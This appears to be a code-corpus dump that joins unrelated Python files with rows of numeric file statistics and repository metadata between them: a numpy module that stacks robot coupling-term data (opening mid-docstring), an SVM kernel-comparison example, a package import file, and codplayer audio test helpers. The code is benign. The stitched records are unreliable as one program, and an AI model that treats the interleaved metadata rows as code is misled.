    Parameters
    ----------
    dataset : dict
        Must contain 'sub_X' and 'sub_Ct_target', each indexed as
        [primitive_no][setting_no][demo_no] -> 2-D array (dims x time steps).
        May optionally contain 'sub_normalized_phase_PSI_mult_phase_V'
        (same indexing) and 'sub_data_point_priority' (1-D per demo).
        For mode 1 it must also contain
        'trial_idx_ranked_by_outlier_metric_w_exclusion'.
    subset_settings_indices : list of int
        Settings to extract and stack.
    mode : int
        1 = mode_arg lists outlier-rank indices (rank 1 == least likely to
            be an outlier, per the ranking stored in
            'trial_idx_ranked_by_outlier_metric_w_exclusion'); e.g.
            mode_arg=[1,3,4,5] stacks the trials ranked 1, 3, 4 and 5
            (RECOMMENDED).
        2 = mode_arg directly lists the demo indices to stack.
    mode_arg : list of int
        Interpreted according to `mode` (see above).
    feature_type : str
        Only 'raw' is supported.
    primitive_no : int
        Index of the primitive whose data is stacked.
    fraction_data_points_included_per_demo_traj : float, optional
        Fraction (0..1] of each demo trajectory (from its start) to keep.
        The cutoff is always computed from the 'sub_X' trajectory length so
        that all stacked quantities stay point-aligned.

    Returns
    -------
    X, Ct_target : ndarray
        Stacked matrices, transposed to (data points x dims).
    normalized_phase_PSI_mult_phase_V : ndarray or None
        None when 'sub_normalized_phase_PSI_mult_phase_V' is absent.
    data_point_priority : ndarray or None
        Column vector (N x 1), or None when 'sub_data_point_priority' is
        absent.

    Raises
    ------
    ValueError
        If feature_type is not 'raw'.
    """
    assert ((mode == 1) or (mode == 2))
    if (feature_type != 'raw'):
        # Fail fast: previously an unsupported feature_type left the
        # per-setting lists as None and crashed later inside np.hstack
        # with an unhelpful TypeError.
        raise ValueError("Unsupported feature_type: '%s'" % str(feature_type))

    def _cutoff(setting_no, nd):
        # Number of leading time steps of demo `nd` to keep; always derived
        # from the 'sub_X' trajectory length so that X, Ct_target, phase
        # features and priorities stay point-aligned.
        return int(
            round(fraction_data_points_included_per_demo_traj *
                  dataset['sub_X'][primitive_no][setting_no][nd].shape[1]))

    if (mode == 1):
        # mode_arg lists outlier ranks; actual demo indices are resolved
        # per setting inside the loop below.
        subset_outlier_ranked_demo_indices = mode_arg
    elif (mode == 2):
        # mode_arg directly lists the demo indices to stack.
        subset_demos_indices = mode_arg
    N_settings_to_extract = len(subset_settings_indices)
    list_X_setting = [None] * N_settings_to_extract
    list_Ct_target_setting = [None] * N_settings_to_extract
    list_normalized_phase_PSI_mult_phase_V_setting = [None] * N_settings_to_extract
    list_data_point_priority_setting = [None] * N_settings_to_extract
    for ns_idx in range(N_settings_to_extract):
        setting_no = subset_settings_indices[ns_idx]
        if (mode == 1):
            # Keep only the requested ranks that actually exist for this
            # setting, then map ranks to demo indices.
            existed_subset_outlier_ranked_demo_indices = list(
                set(
                    range(
                        len(dataset['trial_idx_ranked_by_outlier_metric_w_exclusion']
                            [primitive_no][setting_no]))).intersection(
                                set(subset_outlier_ranked_demo_indices)))
            subset_demos_indices = [
                dataset['trial_idx_ranked_by_outlier_metric_w_exclusion']
                [primitive_no][setting_no][ssidx]
                for ssidx in existed_subset_outlier_ranked_demo_indices
            ]
        list_X_setting[ns_idx] = np.hstack([
            dataset['sub_X'][primitive_no][setting_no][nd][:, :_cutoff(setting_no, nd)]
            for nd in subset_demos_indices
        ])
        list_Ct_target_setting[ns_idx] = np.hstack([
            dataset['sub_Ct_target'][primitive_no][setting_no][nd][:, :_cutoff(setting_no, nd)]
            for nd in subset_demos_indices
        ])
        if 'sub_normalized_phase_PSI_mult_phase_V' in dataset:
            list_normalized_phase_PSI_mult_phase_V_setting[ns_idx] = np.hstack([
                dataset['sub_normalized_phase_PSI_mult_phase_V'][primitive_no]
                [setting_no][nd][:, :_cutoff(setting_no, nd)]
                for nd in subset_demos_indices
            ])
        if 'sub_data_point_priority' in dataset:
            # priorities are 1-D per demo, hence the 1-D slice
            list_data_point_priority_setting[ns_idx] = np.hstack([
                dataset['sub_data_point_priority'][primitive_no][setting_no]
                [nd][:_cutoff(setting_no, nd)]
                for nd in subset_demos_indices
            ])
    # Transpose so rows are data points and columns are dimensions.
    X = np.hstack(list_X_setting).T
    Ct_target = np.hstack(list_Ct_target_setting).T
    if 'sub_normalized_phase_PSI_mult_phase_V' in dataset:
        normalized_phase_PSI_mult_phase_V = np.hstack(
            list_normalized_phase_PSI_mult_phase_V_setting).T
    else:
        normalized_phase_PSI_mult_phase_V = None
    if 'sub_data_point_priority' in dataset:
        data_point_priority = np.hstack(list_data_point_priority_setting)
        # reshape to an explicit column vector (N x 1)
        data_point_priority = data_point_priority.reshape(
            data_point_priority.shape[0], 1)
    else:
        data_point_priority = None
    return X, Ct_target, normalized_phase_PSI_mult_phase_V, data_point_priority
def prepareRecurCtData(task_type,
                       dataset_Ct,
                       subset_settings_indices,
                       considered_subset_outlier_ranked_demo_indices,
                       generalization_subset_outlier_ranked_demo_indices,
                       post_filename_stacked_data,
                       out_data_dir=''):
    """Stack recurrent coupling-term data for training and generalization
    splits, optionally dumping each stacked matrix to .mat files.

    Parameters
    ----------
    task_type : str
        Tag embedded in the output .mat file names.
    dataset_Ct : dict
        Coupling-term dataset as consumed by stackRecurCtDataset().
    subset_settings_indices : list of int
        Settings to include.
    considered_subset_outlier_ranked_demo_indices : list of int
        All outlier-rank indices considered; the training split is this set
        minus the generalization set.
    generalization_subset_outlier_ranked_demo_indices : list of int
        Outlier-rank indices held out for the generalization test. If empty
        it is replaced by [1] because downstream processing cannot handle an
        empty list.
    post_filename_stacked_data : str
        Suffix embedded in the output .mat file names.
    out_data_dir : str, optional
        If an existing directory, stacked matrices are saved there as
        single-key .mat files; otherwise saving is silently skipped.

    Returns
    -------
    tuple
        (X, Ct_target, normalized_phase_PSI_mult_phase_V_times_dt_per_tau,
        data_point_priority, Ct_t_minus_1_times_dt_per_tau, Ct_t_minus_1),
        each a 2-element list (index 0 = training split, 1 = generalization
        test split) of per-primitive arrays.
    """
    feature_type = 'raw'
    mode_stack_dataset = 1  # select demos by outlier rank
    N_primitive = len(dataset_Ct['sub_Ct_target'])
    training_subset_outlier_ranked_demo_indices = list(
        set(considered_subset_outlier_ranked_demo_indices) -
        set(generalization_subset_outlier_ranked_demo_indices))
    if (generalization_subset_outlier_ranked_demo_indices == []):
        generalization_subset_outlier_ranked_demo_indices = [
            1
        ]  # CANNOT really be empty (for further Python processing)
    list_subset_outlier_ranked_demo_indices = [
        training_subset_outlier_ranked_demo_indices,
        generalization_subset_outlier_ranked_demo_indices
    ]
    list_pre_filename_stacked_data = ['', 'test_unroll_']
    X = [[None] * N_primitive for j in range(2)]
    Ct_target = [[None] * N_primitive for j in range(2)]
    normalized_phase_PSI_mult_phase_V_times_dt_per_tau = [
        [None] * N_primitive for j in range(2)
    ]
    data_point_priority = [[None] * N_primitive for j in range(2)]
    Ct_t_minus_1_times_dt_per_tau = [[None] * N_primitive
                                     for j in range(2)]  # (Ct[t-1] * (dt/tau))
    Ct_t_minus_1 = [[None] * N_primitive for j in range(2)]  # (Ct[t-1])
    # NOTE: the primitive loop variable was renamed from `np` to `prim_idx`
    # so that it no longer shadows the numpy module.
    for ntype in range(len(list_pre_filename_stacked_data)):
        for prim_idx in range(N_primitive):
            [
                X[ntype][prim_idx], Ct_target[ntype][prim_idx],
                normalized_phase_PSI_mult_phase_V_times_dt_per_tau[ntype][prim_idx],
                data_point_priority[ntype][prim_idx],
                Ct_t_minus_1_times_dt_per_tau[ntype][prim_idx],
                Ct_t_minus_1[ntype][prim_idx]
            ] = stackRecurCtDataset(dataset_Ct, subset_settings_indices,
                                    mode_stack_dataset,
                                    list_subset_outlier_ranked_demo_indices[ntype],
                                    feature_type, prim_idx)
            # All stacked quantities must agree on the number of data points.
            assert (X[ntype][prim_idx].shape[0] ==
                    Ct_target[ntype][prim_idx].shape[0])
            assert (X[ntype][prim_idx].shape[0] ==
                    normalized_phase_PSI_mult_phase_V_times_dt_per_tau[ntype]
                    [prim_idx].shape[0])
            assert (X[ntype][prim_idx].shape[0] ==
                    data_point_priority[ntype][prim_idx].shape[0])
            assert (X[ntype][prim_idx].shape[0] ==
                    Ct_t_minus_1_times_dt_per_tau[ntype][prim_idx].shape[0])
            assert (X[ntype][prim_idx].shape[0] ==
                    Ct_t_minus_1[ntype][prim_idx].shape[0])
            if (os.path.isdir(out_data_dir)):
                # Each stacked matrix goes into its own single-key .mat file.
                X_dict = {'X': X[ntype][prim_idx]}
                Ct_target_dict = {'Ct_target': Ct_target[ntype][prim_idx]}
                normalized_phase_PSI_mult_phase_V_times_dt_per_tau_dict = {
                    'normalized_phase_PSI_mult_phase_V_times_dt_per_tau':
                        normalized_phase_PSI_mult_phase_V_times_dt_per_tau[ntype][prim_idx]
                }
                data_point_priority_dict = {
                    'data_point_priority': data_point_priority[ntype][prim_idx]
                }
                Ct_t_minus_1_times_dt_per_tau_dict = {
                    'Ct_t_minus_1_times_dt_per_tau':
                        Ct_t_minus_1_times_dt_per_tau[ntype][prim_idx]
                }
                Ct_t_minus_1_dict = {
                    'Ct_t_minus_1': Ct_t_minus_1[ntype][prim_idx]
                }
                sio.savemat(
                    (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
                     'prim_' + str(prim_idx + 1) + '_X_' + feature_type + '_' +
                     task_type + post_filename_stacked_data + '.mat'), X_dict)
                sio.savemat(
                    (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
                     'prim_' + str(prim_idx + 1) + '_Ct_target_' + task_type +
                     post_filename_stacked_data + '.mat'), Ct_target_dict)
                sio.savemat(
                    (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
                     'prim_' + str(prim_idx + 1) +
                     '_normalized_phase_PSI_mult_phase_V_times_dt_per_tau_' +
                     task_type + post_filename_stacked_data + '.mat'),
                    normalized_phase_PSI_mult_phase_V_times_dt_per_tau_dict)
                sio.savemat(
                    (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
                     'prim_' + str(prim_idx + 1) + '_data_point_priority_' +
                     task_type + post_filename_stacked_data + '.mat'),
                    data_point_priority_dict)
                sio.savemat(
                    (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
                     'prim_' + str(prim_idx + 1) + '_Ct_t_minus_1_times_dt_per_tau_' +
                     task_type + post_filename_stacked_data + '.mat'),
                    Ct_t_minus_1_times_dt_per_tau_dict)
                sio.savemat(
                    (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
                     'prim_' + str(prim_idx + 1) + '_Ct_t_minus_1_' + task_type +
                     post_filename_stacked_data + '.mat'), Ct_t_minus_1_dict)
            if (ntype == 0):
                print('Total # of Data Points for Training Primitive ' +
                      str(prim_idx + 1) + ': ' + str(X[ntype][prim_idx].shape[0]))
            elif (ntype == 1):
                print('Total # of Data Points for Generalization Test Primitive ' +
                      str(prim_idx + 1) + ': ' + str(X[ntype][prim_idx].shape[0]))
    return X, Ct_target, normalized_phase_PSI_mult_phase_V_times_dt_per_tau, data_point_priority, Ct_t_minus_1_times_dt_per_tau, Ct_t_minus_1
def stackRecurCtDataset(dataset, subset_settings_indices, mode, mode_arg,
                        feature_type, primitive_no):
    """Stack selected demonstrations of one primitive for recurrent
    coupling-term training.

    Like stackDataset(), but each demo contributes time steps 1..T-1 as
    inputs/targets while also returning the previous-step coupling term
    Ct[t-1] and Ct[t-1] * (dt/tau), where dt/tau = 1/(traj_length - 1).

    Parameters
    ----------
    dataset : dict
        Must contain 'sub_X' and 'sub_Ct_target', indexed as
        [primitive_no][setting_no][demo_no] -> 2-D array (dims x time steps).
        May optionally contain 'sub_normalized_phase_PSI_mult_phase_V' and
        'sub_data_point_priority'. For mode 1 it must also contain
        'trial_idx_ranked_by_outlier_metric_w_exclusion'.
    subset_settings_indices : list of int
        Settings to extract and stack.
    mode : int
        1 = mode_arg lists outlier-rank indices (rank 1 == least likely to
            be an outlier; RECOMMENDED); 2 = mode_arg directly lists demo
            indices.
    mode_arg : list of int
        Interpreted according to `mode`.
    feature_type : str
        Only 'raw' is supported.
    primitive_no : int
        Index of the primitive whose data is stacked.

    Returns
    -------
    tuple
        (X, Ct_target, normalized_phase_PSI_mult_phase_V_times_dt_per_tau,
        data_point_priority, Ct_t_minus_1_times_dt_per_tau, Ct_t_minus_1),
        all transposed to (data points x dims); the phase and priority
        outputs are None when their dataset keys are absent.

    Raises
    ------
    ValueError
        If feature_type is not 'raw'.
    """
    assert ((mode == 1) or (mode == 2))
    if (feature_type != 'raw'):
        # Fail fast with a clear message instead of a cryptic
        # np.hstack(None) TypeError at the end of the function.
        raise ValueError("Unsupported feature_type: '%s'" % str(feature_type))
    if (mode == 1):
        # mode_arg lists outlier ranks; actual demo indices are resolved
        # per setting inside the loop below.
        subset_outlier_ranked_demo_indices = mode_arg
    elif (mode == 2):
        # mode_arg directly lists the demo indices to stack.
        subset_demos_indices = mode_arg
    N_settings_to_extract = len(subset_settings_indices)
    list_X_setting = [None] * N_settings_to_extract
    list_Ct_target_setting = [None] * N_settings_to_extract
    list_normalized_phase_PSI_mult_phase_V_times_dt_per_tau_setting = [
        None
    ] * N_settings_to_extract
    list_data_point_priority_setting = [None] * N_settings_to_extract
    list_Ct_t_minus_1_times_dt_per_tau = [None] * N_settings_to_extract
    list_Ct_t_minus_1 = [None] * N_settings_to_extract
    for ns_idx in range(N_settings_to_extract):
        setting_no = subset_settings_indices[ns_idx]
        if (mode == 1):
            # Keep only the requested ranks that actually exist for this
            # setting, then map ranks to demo indices.
            existed_subset_outlier_ranked_demo_indices = list(
                set(
                    range(
                        len(dataset['trial_idx_ranked_by_outlier_metric_w_exclusion']
                            [primitive_no][setting_no]))).intersection(
                                set(subset_outlier_ranked_demo_indices)))
            subset_demos_indices = [
                dataset['trial_idx_ranked_by_outlier_metric_w_exclusion']
                [primitive_no][setting_no][ssidx]
                for ssidx in existed_subset_outlier_ranked_demo_indices
            ]
        # Inputs/targets drop the first time step ([:, 1:]); the t-1 terms
        # drop the last ([:, :-1]) so both spans have equal length.
        list_X_setting[ns_idx] = np.hstack([
            dataset['sub_X'][primitive_no][setting_no][nd][:, 1:]
            for nd in subset_demos_indices
        ])
        list_Ct_target_setting[ns_idx] = np.hstack([
            dataset['sub_Ct_target'][primitive_no][setting_no][nd][:, 1:]
            for nd in subset_demos_indices
        ])
        # dt/tau = 1/(traj_length-1), taken from the Ct trajectory length.
        list_Ct_t_minus_1_times_dt_per_tau[ns_idx] = np.hstack([
            ((1.0 /
              (dataset['sub_Ct_target'][primitive_no][setting_no][nd].shape[1] - 1))
             * dataset['sub_Ct_target'][primitive_no][setting_no][nd][:, :-1])
            for nd in subset_demos_indices
        ])
        list_Ct_t_minus_1[ns_idx] = np.hstack([
            dataset['sub_Ct_target'][primitive_no][setting_no][nd][:, :-1]
            for nd in subset_demos_indices
        ])
        if 'sub_normalized_phase_PSI_mult_phase_V' in dataset:
            # Here dt/tau comes from the phase trajectory's own length.
            list_normalized_phase_PSI_mult_phase_V_times_dt_per_tau_setting[
                ns_idx] = np.hstack([
                    ((1.0 / (dataset['sub_normalized_phase_PSI_mult_phase_V']
                             [primitive_no][setting_no][nd].shape[1] - 1)) *
                     dataset['sub_normalized_phase_PSI_mult_phase_V'][primitive_no]
                     [setting_no][nd][:, 1:]) for nd in subset_demos_indices
                ])
        if 'sub_data_point_priority' in dataset:
            # priorities are 1-D per demo, hence the 1-D slice
            list_data_point_priority_setting[ns_idx] = np.hstack([
                dataset['sub_data_point_priority'][primitive_no][setting_no][nd][1:]
                for nd in subset_demos_indices
            ])
    # Transpose so rows are data points and columns are dimensions.
    X = np.hstack(list_X_setting).T
    Ct_target = np.hstack(list_Ct_target_setting).T
    Ct_t_minus_1_times_dt_per_tau = np.hstack(
        list_Ct_t_minus_1_times_dt_per_tau).T
    Ct_t_minus_1 = np.hstack(list_Ct_t_minus_1).T
    if 'sub_normalized_phase_PSI_mult_phase_V' in dataset:
        normalized_phase_PSI_mult_phase_V_times_dt_per_tau = np.hstack(
            list_normalized_phase_PSI_mult_phase_V_times_dt_per_tau_setting).T
    else:
        normalized_phase_PSI_mult_phase_V_times_dt_per_tau = None
    if 'sub_data_point_priority' in dataset:
        data_point_priority = np.hstack(list_data_point_priority_setting)
        # reshape to an explicit column vector (N x 1)
        data_point_priority = data_point_priority.reshape(
            data_point_priority.shape[0], 1)
    else:
        data_point_priority = None
    return X, Ct_target, normalized_phase_PSI_mult_phase_V_times_dt_per_tau, data_point_priority, Ct_t_minus_1_times_dt_per_tau, Ct_t_minus_1
| 44.39951
| 208
| 0.664367
| 2,518
| 18,115
| 4.284353
| 0.067514
| 0.036707
| 0.069336
| 0.081572
| 0.976455
| 0.970152
| 0.967835
| 0.956526
| 0.951428
| 0.937616
| 0
| 0.011539
| 0.234557
| 18,115
| 407
| 209
| 44.5086
| 0.766479
| 0.076511
| 0
| 0.705357
| 0
| 0
| 0.087436
| 0.051084
| 0
| 0
| 0
| 0
| 0.029762
| 1
| 0.011905
| false
| 0
| 0.017857
| 0
| 0.041667
| 0.011905
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
39dbab390b1b73203c43afb52f411617d9a50949
| 3,855
|
py
|
Python
|
examples/svm_example.py
|
Yangruipis/simple_ml
|
09657f6b017b973a5201aa611774d6ac8f0fc0a2
|
[
"MIT"
] | 25
|
2018-04-17T04:38:51.000Z
|
2021-10-09T04:07:53.000Z
|
examples/svm_example.py
|
Yangruipis/simple_ml
|
09657f6b017b973a5201aa611774d6ac8f0fc0a2
|
[
"MIT"
] | null | null | null |
examples/svm_example.py
|
Yangruipis/simple_ml
|
09657f6b017b973a5201aa611774d6ac8f0fc0a2
|
[
"MIT"
] | 5
|
2018-04-17T05:27:00.000Z
|
2020-12-01T02:55:15.000Z
|
# -*- coding:utf-8 -*-
from simple_ml.svm import *
from simple_ml.classify_data import *
from simple_ml.data_handle import train_test_split
def iris_example():
    """Linearly separable case: binary SVM on iris classes 0 and 1.

    Fits a linear-kernel SVM on a train split, prints the learned
    multipliers/intercept and training predictions, then plots the
    classifier on the test split.
    """
    data, target = get_iris()
    two_class_mask = (target == 0) | (target == 1)
    data = data[two_class_mask]
    target = target[two_class_mask]
    x_train, y_train, x_test, y_test = train_test_split(data, target, 0.3, 918)
    classifier = SVM(0.6, 0.001, 0.00001, 50, KernelType.linear)
    classifier.fit(x_train, y_train)
    print(classifier.alphas, classifier.b)
    print(classifier.predict(x_train))
    classifier.classify_plot(x_test, y_test)
def iris_example2():
    """Not linearly separable: soft-margin case, iris classes 1 and 2.

    Same pipeline as iris_example() but on the harder class pair, relying
    on the SVM's slack (soft margin) to tolerate overlapping classes.
    """
    data, target = get_iris()
    two_class_mask = (target == 1) | (target == 2)
    data = data[two_class_mask]
    target = target[two_class_mask]
    x_train, y_train, x_test, y_test = train_test_split(data, target, 0.3, 918)
    classifier = SVM(0.6, 0.001, 0.00001, 50, KernelType.linear)
    classifier.fit(x_train, y_train)
    print(classifier.alphas, classifier.b)
    print(classifier.predict(x_train))
    classifier.classify_plot(x_test, y_test)
def moon_example():
    """Kernel comparison on a nonlinearly-separable two-class problem.

    Trains a linear-kernel SVM and several nonlinear-kernel SVMs on the
    same train/test split, printing the learned parameters and plotting
    each classifier.

    NOTE(review): despite the function name this loads the wine dataset
    via get_wine(); the original '# get moon()' comment suggests a moons
    dataset was intended -- confirm before changing.
    """
    x, y = get_wine()  # get moon()
    x = x[(y == 0) | (y == 1)]
    y = y[(y == 0) | (y == 1)]
    x_train, y_train, x_test, y_test = train_test_split(x, y, 0.3, 918)
    # (kernel type, extra kernel kwargs, plot title suffix).
    # For the Gaussian kernel a small sigma overfits and a large sigma
    # underfits. The sigmoid title previously said theta=1 although the
    # model actually uses theta=-1; fixed to match.
    kernel_configs = [
        (KernelType.linear, {}, ", Linear"),
        (KernelType.gaussian, {'sigma': 0.5}, ", Gaussian(sigma=0.5)"),
        (KernelType.gaussian, {'sigma': 1}, ", Gaussian(sigma=1.0)"),
        (KernelType.laplace, {'sigma': 1}, ", Laplace(sigma=1)"),
        (KernelType.sigmoid, {'beta': 1, 'theta': -1}, ", Sigmoid(beta=1,theta=-1)"),
    ]
    for kernel_type, kernel_kwargs, title in kernel_configs:
        mysvm = SVM(0.6, 0.001, 0.00001, 50, kernel_type, **kernel_kwargs)
        mysvm.fit(x_train, y_train)
        print(mysvm.alphas, mysvm.b)
        print(mysvm.predict(x_train))
        mysvm.classify_plot(x_test, y_test, title)
def multi_class_example():
    """Kernel comparison on the full (multi-class) wine dataset.

    Same kernel sweep as the two-class example, but without filtering the
    labels, so the SVM's multi-class handling is exercised.
    """
    x, y = get_wine()  # get moon()
    x_train, y_train, x_test, y_test = train_test_split(x, y, 0.3, 918)
    # (kernel type, extra kernel kwargs, plot title suffix).
    # For the Gaussian kernel a small sigma overfits and a large sigma
    # underfits. The sigmoid title previously said theta=1 although the
    # model actually uses theta=-1; fixed to match.
    kernel_configs = [
        (KernelType.linear, {}, ", Linear"),
        (KernelType.gaussian, {'sigma': 0.5}, ", Gaussian(sigma=0.5)"),
        (KernelType.gaussian, {'sigma': 1}, ", Gaussian(sigma=1)"),
        (KernelType.laplace, {'sigma': 1}, ", Laplace(sigma=1)"),
        (KernelType.sigmoid, {'beta': 1, 'theta': -1}, ", Sigmoid(beta=1,theta=-1)"),
    ]
    for kernel_type, kernel_kwargs, title in kernel_configs:
        mysvm = SVM(0.6, 0.001, 0.00001, 50, kernel_type, **kernel_kwargs)
        mysvm.fit(x_train, y_train)
        print(mysvm.alphas, mysvm.b)
        print(mysvm.predict(x_train))
        mysvm.classify_plot(x_test, y_test, title)
if __name__ == '__main__':
    # Uncomment to run the individual two-class demos instead:
    # iris_example()
    # moon_example()
    multi_class_example()
| 30.354331
| 78
| 0.636057
| 643
| 3,855
| 3.620529
| 0.096423
| 0.072165
| 0.04811
| 0.082474
| 0.885309
| 0.885309
| 0.885309
| 0.871564
| 0.857388
| 0.857388
| 0
| 0.073226
| 0.19585
| 3,855
| 126
| 79
| 30.595238
| 0.677742
| 0.047471
| 0
| 0.843373
| 0
| 0
| 0.05323
| 0.012753
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048193
| false
| 0
| 0.036145
| 0
| 0.084337
| 0.289157
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f2e661a3048e4e47fa60f7aea909b584b62ba57a
| 128
|
py
|
Python
|
website/handlers/docs/__init__.py
|
glennyonemitsu/funkybomb
|
ee1444e2783b347951aa67265615e18514cac8c5
|
[
"Apache-2.0"
] | 1
|
2018-12-19T18:43:52.000Z
|
2018-12-19T18:43:52.000Z
|
website/handlers/docs/__init__.py
|
glennyonemitsu/funkybomb
|
ee1444e2783b347951aa67265615e18514cac8c5
|
[
"Apache-2.0"
] | null | null | null |
website/handlers/docs/__init__.py
|
glennyonemitsu/funkybomb
|
ee1444e2783b347951aa67265615e18514cac8c5
|
[
"Apache-2.0"
] | null | null | null |
from handlers.docs import basics # noqa
from handlers.docs import patterns # noqa
from handlers.docs import integrations # noqa
| 32
| 45
| 0.8125
| 18
| 128
| 5.777778
| 0.444444
| 0.346154
| 0.461538
| 0.634615
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 128
| 3
| 46
| 42.666667
| 0.945455
| 0.109375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ffc01954f53e41987dc87a2b5a21a463ac9e0673
| 59,802
|
py
|
Python
|
src/codplayer/test/test_player.py
|
petli/codplayer
|
172187b91662affd8e89f572c0db9be1c4257627
|
[
"MIT"
] | 14
|
2015-04-27T20:40:46.000Z
|
2019-02-01T09:22:02.000Z
|
src/codplayer/test/test_player.py
|
petli/codplayer
|
172187b91662affd8e89f572c0db9be1c4257627
|
[
"MIT"
] | 10
|
2015-01-05T18:11:28.000Z
|
2018-09-03T08:42:50.000Z
|
src/codplayer/test/test_player.py
|
petli/codplayer
|
172187b91662affd8e89f572c0db9be1c4257627
|
[
"MIT"
] | 4
|
2017-03-03T16:59:39.000Z
|
2019-11-08T11:15:06.000Z
|
# codplayer - test the player core, primarily the Transport class
#
# Copyright 2013 Peter Liljenberg <peter.liljenberg@gmail.com>
#
# Distributed under an MIT license, please see LICENSE in the top dir.
import unittest
import threading
import time
import sys
import traceback
import os
from .. import player
from .. import state
from .. import source
from .. import sink
from .. import model
from .. import audio
# Substring matched against each test's id(): setting the DEBUG_TEST env var
# to (part of) a test id enables verbose stderr logging for that test. The
# default is a sentinel string that matches no test id, i.e. logging off.
debug = os.getenv('DEBUG_TEST', 'fake-string-to-disable-logging')
#
# Transport test and helper classes
#
class TestPublisher(object):
    """Some synchronisation to let the test cases detect when the
    Transport has updated the state.

    Wraps a threading.Event: update_state() (called by the Transport)
    sets it, and the test blocks on wait() / resets it with clear().
    """

    def __init__(self, test):
        super(TestPublisher, self).__init__()
        # test.id() is matched against the DEBUG_TEST env var (see `debug`).
        self.test_id = test.id()
        self.updated = threading.Event()

    def clear(self):
        # Forget any previous update before triggering a new one.
        self.updated.clear()

    def wait(self, timeout):
        # True if a state update arrived within `timeout` seconds.
        return self.updated.wait(timeout)

    def update_state(self, state):
        # Called by the Transport; optionally logs, then wakes waiters.
        if debug in self.test_id:
            sys.stderr.write('{0.test_id}: {1}\n'.format(self, state))
        self.updated.set()
class DummySource(source.Source):
    """Packet source generating dummy packets, each a second long.

    Builds an in-memory disc with `num_tracks` equal-length tracks and
    yields `num_packets` one-second AudioPackets per track. A track whose
    number equals `pause_after_track_number` gets PAUSE_AFTER set on its
    last packet.
    """

    TRACK_LENGTH_SECS = 1000
    TRACK_LENGTH_FRAMES = TRACK_LENGTH_SECS * model.PCM.rate

    def __init__(self, disc_id, num_tracks, num_packets = None,
                 pause_after_track_number = None):
        disc = model.DbDisc()
        disc.disc_id = disc_id
        disc.audio_format = model.PCM

        for i in range(num_tracks):
            track = model.DbTrack()
            track.number = i + 1
            track.length = self.TRACK_LENGTH_FRAMES
            if pause_after_track_number == track.number:
                track.pause_after = True
            disc.tracks.append(track)

        super(DummySource, self).__init__(disc)

        # Infinite isn't really that, so we know the test eventually stops
        self.num_packets = num_packets or self.TRACK_LENGTH_SECS

    def iter_packets(self, track_number, packet_rate):
        while track_number < len(self.disc.tracks):
            track = self.disc.tracks[track_number]
            # range() instead of xrange(): identical behaviour here, keeps
            # the module importable on Python 3, and matches the range()
            # already used in __init__ above.
            for i in range(self.num_packets):
                if track.pause_after and i + 1 == self.num_packets:
                    flags = audio.AudioPacket.PAUSE_AFTER
                else:
                    flags = 0
                packet = audio.AudioPacket(self.disc, track, track_number,
                                           i * model.PCM.rate, 1, flags)
                packet.data = '0123456789abcdef'
                yield packet
            track_number += 1
class DummySink(sink.Sink):
    """Scripted sink: asserts that the Transport performs exactly the
    sequence of sink calls described by the given Expect objects, and
    produces each Expect's scripted return value.
    """

    def __init__(self, test, *expect):
        self.test = test
        self.id = test.id()
        # Reversed copy so the next expected call can be pop()ed off the end.
        self.expect = list(expect)
        self.expect.reverse()

    def on_call(self, func, *args):
        # Match one actual sink call against the next Expect: verify the
        # call name, run its checks with the call's arguments, and return
        # its scripted value (if any).
        if debug in self.id:
            sys.stderr.write('{0}: {1}{2}\n'.format(self.id, func, args))

        if not self.expect:
            self.test.fail('unexpected additional call {0}{1}'.format(func, args))

        e = self.expect.pop()

        self.test.assertEqual(e.func, func, e.msg)

        if e.checks:
            try:
                e.checks(*args)
            except:
                # Surface assertion/other errors from inside the lambda as
                # a test failure with a full traceback.
                self.test.fail(traceback.format_exc())

        if e.ret:
            try:
                return e.ret(*args)
            except:
                self.test.fail(traceback.format_exc())

    def done(self):
        # Call at the end of a test: every expected call must be consumed.
        if self.expect:
            self.test.fail('test finished unexpectedly, {0} events remaining'.format(len(self.expect)))

    # sink.Sink interface below: each method just routes through on_call.

    def pause(self):
        return self.on_call('pause')

    def resume(self):
        self.on_call('resume')

    def stop(self):
        self.on_call('stop')

    def start(self, format):
        self.on_call('start', format)

    def add_packet(self, packet, offset):
        return self.on_call('add_packet', packet, offset)

    def drain(self):
        return self.on_call('drain')
class Expect(object):
    """One scripted sink call.

    func   -- name of the sink method expected to be invoked
    msg    -- optional assertion message used when the call mismatches
    checks -- optional callable invoked with the call's arguments
    ret    -- optional callable producing the call's return value
    """

    def __init__(self, func, msg = None, checks = None, ret = None):
        self.func, self.msg = func, msg
        self.checks, self.ret = checks, ret
class DummyPlayer:
    """Minimal stand-in for the player object the Transport expects:
    provides logging hooks and forwards state updates to a TestPublisher.
    """

    def __init__(self, test, publisher):
        self._id = test.id()
        self._publisher = publisher

    def log(self, msg, *args, **kwargs):
        # Log to stderr only when DEBUG_TEST matches this test's id.
        if debug in self._id:
            sys.stderr.write('{0}: {1}: {2}\n'.format(
                self._id, threading.current_thread().name,
                msg.format(*args, **kwargs)))

